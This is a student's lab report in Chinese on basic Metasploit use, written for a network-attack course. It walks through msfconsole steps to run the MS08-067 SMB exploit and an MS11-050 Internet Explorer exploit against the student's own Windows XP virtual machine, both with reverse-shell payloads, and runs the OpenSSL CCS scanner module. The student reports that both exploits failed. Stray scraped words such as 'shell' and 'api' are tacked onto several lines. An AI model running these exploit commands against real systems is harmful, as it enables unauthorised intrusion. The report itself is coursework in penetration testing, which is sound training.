20145338《網絡對抗》 MSF基礎應用html
·掌握metasploit的基本應用方式,掌握經常使用的三種攻擊方式的思路。
具體須要完成(1)一個主動攻擊;(2)一個針對瀏覽器的攻擊;(3)一個針對客戶端的攻擊;(4)成功應用任何一個輔助模塊。shell
·exploit:經過漏洞對程序攻擊的途徑,是一種手段或通道。
·payload:具體的攻擊代碼
·encode:假裝、隱藏 達到免殺目的。windows
##MS08_067安全漏洞滲透攻擊實踐api
實驗前先查看kali與靶機是否能夠ping通瀏覽器
靶機爲我此次新拷的WinXPenSP3
(將Kali與靶機網絡調製NAT模式,不然ping不通啊)
安全
1 ·輸入msfconsole進入msf
2 ·進入該漏洞模塊的使用(use exploit/windows/smb/ms08_067_netapi)
3 ·輸入命令show payload會顯示出有效的攻擊載荷,
4 ·show targets會顯示出能夠被攻擊的靶機的操做系統型號
5 ·設置攻擊有效載荷(set payload generic/shell_reverse_tcp)
6 ·輸入show options顯示咱們須要在攻擊前須要設置的數據,將靶機IP(RHOST)與kali IP(LHOST)進行設置
7 ·輸入exploit開始攻擊
攻擊失敗。。。。未完待續。。網絡
呀 ping都沒ping通 不失敗纔怪哦 。。。
繼續。。。
tcp
·在kali終端開啓msfconsole,利用search命令搜索。
輸入命令use exploit/windows/browser/ms11_050_mshtml_cobjetelement,進入該漏洞模塊。使用info命令查看模塊信息 。
設置對應的載荷set payload windows/meterpreter/reverese_tcp;show options查看須要設置的相關信息:
查看配置滲透攻擊所需的配置選項
配置相關信息:set LHOST; ‘kali Ip’;; set LPORT 5338; set URIPATH ,
啓動exploit 生成攻擊
攻擊失敗.操作系統
我選擇auxiliary/scanner/ssl/openssl_ccs.rb
·在auxiliary中選擇scanner中的ssl其中一個模塊ccs.rb
·經過info查看須要配置的東西
·開始掃描
code
比起作不出實驗更讓人難受的是電腦卡的要死 有時候lali還罷工 直接就打不開了,情況百出。你們看到的是何時交的博客 並不知道在底下配置電腦花了多久。。 不過也還好 已經完成一個。